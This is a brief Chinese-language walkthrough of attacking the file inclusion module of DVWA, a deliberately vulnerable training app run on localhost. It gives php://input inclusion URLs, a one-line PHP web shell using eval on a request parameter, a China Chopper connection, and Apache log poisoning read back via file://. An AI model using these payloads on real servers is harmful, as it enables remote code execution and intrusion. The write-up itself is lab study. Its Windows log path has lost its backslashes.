LOW、Medium
包含值是page
使用php://进行http://localhost:8083/DVWA-master/vulnerabilities/fi/?page=php://input
进行post写入小马<?phpeval($_REQUEST[666]);?>
验证http://localhost:8083/DVWA-master/vulnerabilities/fi/?page=php://input&666=phpinfo();
菜刀连接http://localhost:8083/DVWA-master/vulnerabilities/fi/?page=php://input 666
High级别
file://
经过实验值后面只能上传file*,所以利用file://来读取本地的文件
我们可以通过日志文件来进行读取
首先我们先写小马,通过bp,url上写会被转义
更改内容,写上小马,日志里会有
GET/DVWA-master/vulnerabilities/fi/?page= HTTP/1.1
查看日志文件http://localhost:8083/DVWA-master/vulnerabilities/fi/?page=file://D:xamppapachelogsaccess.log
可以看见有666
验证666有没有用http://localhost:8083/DVWA-master/vulnerabilities/fi/?page=file://D:xamppapachelogsaccess.log&666=phpinfo();
用菜刀连http://localhost:8083/DVWA-master/vulnerabilities/fi/?page=file://D:xamppapachelogsaccess.log 666